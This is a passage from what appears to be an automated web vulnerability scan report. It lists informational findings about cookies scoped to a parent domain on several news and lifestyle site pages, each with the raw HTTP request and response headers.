Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3a0a17b7e3454f56a4bcc12d1023d4df; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=02D6064FB59C4177880821E6DA25C485; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:19 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.95. http://lifestyle.redacted/your-home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-home/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-home/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a62fddde6fef43f48d53312bf038943f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DE365542A27E43F9A2D20EEC313CB20E; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

16.96. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-home/room-design/staticslideshowhb.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&gt1=32067 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2d389eb7e7ea4ae0a473db58b1a5758b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=42164453E4924CB89C5B977561EA27D0; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.97. http://lifestyle.redacted/your-life/family-parenting/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/family-parenting/article.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/family-parenting/article.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 29 Jan 2011 23:47:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://lifestyle.redacted/your-life/family-parenting/default.aspx
Set-Cookie: MC1=V=3&GUID=e5a2e16a67154266a9d498fd513a08c5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2588A011AE014923A2AA5BE79447364F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Length: 0


16.98. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/new-year-new-you/video.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/new-year-new-you/video.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a1ed2a58c8c240e8aa192c9ab451625e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1078BE57F6E649E38B580A5D9F01AA70; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.99. http://lifestyle.redacted/your-life/your-money-today/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/your-money-today/article.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/your-money-today/article.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 29 Jan 2011 23:47:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://lifestyle.redacted/your-life/family-parenting/default.aspx
Set-Cookie: MC1=V=3&GUID=0398126e49724201804ec2ac840e992d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=57CE9474CD8C417D817D0DE1275373E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:23 GMT; path=/
Cache-Control: no-cache
Content-Length: 0


16.100. http://lifestyle.redacted/your-life/your-money-today/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/your-money-today/video.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/your-money-today/video.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=90974142a1fa41e29c7695f2839c0b2b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=891F4DE87D9848CF80723C7BDFB3C47D; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.101. http://lifestyle.redacted/your-look/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6dd6fe6121814e1988587a283896d37d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1E75E2518F694A5EA1B2E04278A9FA88; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.102. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/makeup-skin-care-hair/staticslideshowessence.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e4b40a5c5380474087c7ce996b9332b8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D137C55805D5479EA6BDD999E5265BC4; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.103. http://lifestyle.redacted/your-look/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/video/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/video/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2ca1bb8bab954b2e8916ae5a5e84634d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A5D1B9B54E4F4F0A904965554C0FDE74; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:20 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

16.104. http://live.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://live.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: live.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Host,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a4bc8d41ac71ec541f1bf853a146540d; expires=Sat, 25-Jan-2031 02:08:23 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


16.105. http://local.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8349c3df213b40858bffbf1ed5e320d4; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AEB046B1DD804980BD22C1D7DC865D48; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.106. http://local.redacted/events.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /events.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 23:47:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
STATUS_CODE: NotFound
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0af244c7b84341db94fa63f78ec59843; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7CDA6FC0BCE8438688C10A27DAA3A3FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 6288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
       <meta http-e
...[SNIP]...

16.107. http://local.redacted/gas-traffic.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /gas-traffic.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gas-traffic.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=5b47497cc43743d9be4c3d0002efa31f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=72D4472BCF114A3497BE87B9061DAD51; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.108. http://local.redacted/hourly.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /hourly.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hourly.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA25
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fe9b558f11c048c5b0bcfead5c27909c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D700EC8FE6A84E6E86AF10C957726EEB; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.109. http://local.redacted/movies-events.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /movies-events.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies-events.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA28
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=362ea74ed69b4e3e91979daf6227ebc5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=54E9E8A3E60641D9AC7FE4403046D572; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.110. http://local.redacted/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /news.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3953a7e65afb42b0ade3749d752dcf1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C14043A1E67E44BCAA9A3B68AA8AFD89; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.111. http://local.redacted/restaurants.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /restaurants.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /restaurants.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA31
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=11c3bf43b93e4ed9af237f65b02844d7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=47142BBDAAA74E00893F20DA82ED8C2E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.112. http://local.redacted/sports.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /sports.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sports.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:41 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d11d2c165e674866abd16c8b8cb9e1bb; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A7A43B87D4E04DEA9AC850EC95E92AE2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 94929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.113. http://local.redacted/ten-day.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /ten-day.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ten-day.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:49 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b091c91e5f57464f867c86a6838b0181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5D4B178CF6734098BD0B688BB765F218; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:49 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.114. http://local.redacted/weather.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /weather.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /weather.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fd5b4d05da194df0bdd44cf8adbd21ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2B70DCC8FEC94F45B962D0715AF96955; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:33 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48963

